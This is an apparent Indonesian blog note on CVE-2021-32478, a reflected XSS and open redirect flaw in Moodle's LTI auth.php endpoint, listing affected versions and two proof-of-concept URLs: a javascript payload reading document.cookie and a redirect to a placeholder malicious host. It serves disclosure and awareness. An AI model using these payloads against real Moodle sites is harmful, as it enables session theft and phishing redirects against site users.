CVE-2021-32478 adalah sebuah kerentanan yang terdapat di Learning Management System (LMS) Moodle. Kerentanan ini memanfaatkan parameter redirect_uri= pada LTI authorization endpoint yang dapat dieksploitasi menjadi serangan Reflected Cross-site Scripting (RXSS) dan Open Redirect.
Versi yang terdampak
- 3.10 to 3.10.3
- 3.9 to 3.9.6
- 3.8 to 3.8.8
PoC
Reflected XSS
/mod/lti/auth.php?redirect_uri=javascript:alert(document.cookie)
Open Redirect
/mod/lti/auth.php?redirect_uri=hxxp://malicious.url
Hingga di tahun 2024, saya masih menemukan website yang menggunakan LMS Moodle memiliki kerentanan CVE-2021-32478, terutama di Indonesia.
Sekian dan terima kasih.
Maha benar Tuhan, maha kadang-kadang umat-Nya.